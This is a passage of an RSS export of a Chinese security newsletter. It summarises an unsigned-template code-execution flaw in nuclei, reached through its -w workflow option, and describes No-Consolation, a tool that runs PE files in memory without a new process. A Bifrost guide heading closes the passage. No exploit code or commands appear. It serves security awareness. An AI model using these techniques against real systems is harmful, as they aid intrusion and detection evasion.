		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 项目发现 /nuclei中未签名代码模板的执行漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GitHub 上 projectdiscovery/nuclei 项目中存在一个未签名代码模板执行漏洞，允许通过工作流文件执行代码，而不需要 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">-code</code> 选项和签名。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkYXavR3vNL99b7IBgvznQr0Kr6XkQ1icYicW1fV3nHeCoalUmUJdOoa7g/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkYXavR3vNL99b7IBgvznQr0Kr6XkQ1icYicW1fV3nHeCoalUmUJdOoa7g/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122485581581254"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞利用了 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">-w</code> 选项来执行工作流文件，而不是通常用于执行代码模板的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">-t</code> 选项。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过编写恶意的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">code.yaml</code> 文件，其中包含 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">workflows</code> 字段，来执行任意命令。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞可能影响那些将 Nuclei 用于安全扫描的 web 应用程序，允许用户编辑和执行工作流文件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的存在表明，即使在安全工具本身中，也可能存在安全漏洞，这可能会被利用来进行二次攻击。</section></li></ul>
	<br/>
	<p>🏷️: security_vulnerabilities, code_execution, workflows, projectdiscovery, nuclei</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=991c0b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3nwksKq8ZBqrghjtia9TYiblaxU2VXrUpDcAM57Ric0wX9pBg69IusWVyg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487546">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4bffdd7c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487546%26idx%3D1%26sn%3Dd1287857ffd6a62fcd91721f5e93c44d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 19 Jul 2024 09:13:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0718 | elf加密反向shell、红蓝工具推荐</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487535&amp;idx=1&amp;sn=f1ff1579aa1f7cdfaef7c8c4fa906493</link>
      <description>elf加密反向shell、红蓝工具推荐</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-18 08:43</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>elf加密反向shell、红蓝工具推荐</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=454a29a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmf8HKsAOjMBqkaZeYOnBbg39PzU5LRIMgMJpbx44XEZCWJmXX1xsAId49Xm0gFaIHkdibX5Vu3dtQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-18 安全「信息差」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;">
		<span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送「新、热、赞」，降噪增效<br/></p>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			2. 查漏补缺，你可能错过了一些小东西</p>
	</blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 内存中执行未经管理的PE文件工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">No-Consolation</code> 是一款可以在内存中执行未经管理的 PE 文件（包括 EXE 和 DLL），并且能够检索输出结果而不需要分配控制台或创建新进程的工具。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3zbGPwcyZK8z6vPwg5RZoEAFbricbkwnfvNc6x6EYvVxibgR6xSCuTaiaQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3zbGPwcyZK8z6vPwg5RZoEAFbricbkwnfvNc6x6EYvVxibgR6xSCuTaiaQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522185885581552"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">No-Consolation</code> 工具的设计目的是在不创建新进程和控制台的情况下，高效地在内存中执行未经管理的 PE 文件，并且能够处理这些文件的输出。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的内存管理功能，包括加载、保存和卸载 PE 文件，提高了操作的灵活性和安全性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过丰富的命令行选项，用户可以精确控制 PE 文件的加载方式、执行方式和内存管理行为，满足不同的使用场景。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">No-Consolation</code> 的设计考虑到了对 DLL 的支持，包括链接到 PEB、执行特定导出函数以及处理依赖项。</section></li></ul>
	<br/>
	<p>🏷️: No-Consolation, PE文件执行, 内存管理, 工具, 编程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Bifrost 工具使用指南</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
